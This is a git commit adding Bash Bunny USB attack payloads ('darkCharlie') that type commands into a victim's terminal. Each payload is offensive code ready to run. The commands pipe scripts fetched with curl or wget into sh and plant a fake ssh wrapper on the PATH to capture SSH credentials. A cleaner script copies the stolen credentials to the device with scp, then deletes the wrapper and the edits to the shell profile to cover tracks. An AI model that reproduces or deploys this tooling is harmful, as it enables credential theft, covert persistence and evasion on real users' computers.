Now with injection and cleaning
parent
0f4129b124
commit
77b1a4e123
|
@ -0,0 +1,66 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Title: darkCharlie{Cleaner}
|
||||||
|
# Author: Michael Weinstein
|
||||||
|
# Target: Mac/Linux
|
||||||
|
# Version: 0.1
|
||||||
|
#
|
||||||
|
# Get the ssh creds from our loot collection.
|
||||||
|
# And clean up after
|
||||||
|
#
|
||||||
|
# White | Ready
|
||||||
|
# Blue blinking | Attacking
|
||||||
|
# Green | Finished
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
#setup the attack on macos (if false, attack is for Linux)
|
||||||
|
mac=false
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||||
|
else
|
||||||
|
ATTACKMODE ECM_ETHERNET HID
|
||||||
|
fi
|
||||||
|
|
||||||
|
DUCKY_LANG us
|
||||||
|
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
GET HOST_IP
|
||||||
|
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||||
|
LOOT=/root/udisk/loot/darkCharlie
|
||||||
|
mkdir -p $LOOT
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
RUN OSX terminal
|
||||||
|
else
|
||||||
|
RUN UNITY xterm
|
||||||
|
fi
|
||||||
|
QUACK DELAY 2000
|
||||||
|
|
||||||
|
QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.sudo.passwd #nice hiding of known host info
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING hak5bunny
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile
|
||||||
|
else
|
||||||
|
QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
|
||||||
|
fi
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
LED SUCCESS
|
||||||
|
#See you, space cowboy...
|
|
@ -0,0 +1,79 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Title: darkCharlie
|
||||||
|
# Author: Michael Weinstein
|
||||||
|
# Target: Mac/Linux
|
||||||
|
# Version: 0.1
|
||||||
|
#
|
||||||
|
# Create a wrapper for ssh sessions that
|
||||||
|
# will live inside ~/.config/ssh and be added
|
||||||
|
# tn the $PATH.
|
||||||
|
#
|
||||||
|
# This payload was inspired greatly by SudoBackdoor
|
||||||
|
# and much of the code here was derived (or copied
|
||||||
|
# wholesale) from that with great thanks to oXis.
|
||||||
|
#
|
||||||
|
# White | Ready
|
||||||
|
# Amber blinking | Waiting for server
|
||||||
|
# Blue blinking | Attacking
|
||||||
|
# Green | Finished
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
#setup the attack on macos (if false, attack is for Linux)
|
||||||
|
mac=false
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||||
|
else
|
||||||
|
ATTACKMODE ECM_ETHERNET HID
|
||||||
|
fi
|
||||||
|
|
||||||
|
DUCKY_LANG us
|
||||||
|
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
GET HOST_IP
|
||||||
|
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||||
|
|
||||||
|
# starting server
|
||||||
|
LED SPECIAL
|
||||||
|
|
||||||
|
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||||
|
python -m SimpleHTTPServer 80 &
|
||||||
|
|
||||||
|
# wait until port is listening (credit audibleblink)
|
||||||
|
while ! nc -z localhost 80; do sleep 0.2; done
|
||||||
|
# that was brilliant!
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
RUN OSX terminal
|
||||||
|
else
|
||||||
|
RUN UNITY xterm
|
||||||
|
fi
|
||||||
|
QUACK DELAY 2000
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
|
||||||
|
QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh
|
||||||
|
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
|
||||||
|
QUACK STRING ~/.config/ssh/ssh --initializeScript
|
||||||
|
else
|
||||||
|
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
|
||||||
|
QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh #Will test this on a mac when I finish up
|
||||||
|
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
|
||||||
|
QUACK STRING ~/.config/ssh/ssh --initializeScript
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20
|
|
@ -0,0 +1,9 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
chmod u+x ~/.config/sudo/sudo
|
||||||
|
if [ -f ~/.bash_profile ]
|
||||||
|
then
|
||||||
|
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile
|
||||||
|
else
|
||||||
|
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc
|
||||||
|
fi
|
|
@ -0,0 +1,11 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
if [ ! -d ~/.config/ssh ]
|
||||||
|
then
|
||||||
|
mkdir -p ~/.config/ssh
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ -f ~/.config/ssh/ssh ]
|
||||||
|
then
|
||||||
|
rm ~/.config/ssh/ssh
|
||||||
|
fi
|
Loading…
Reference in New Issue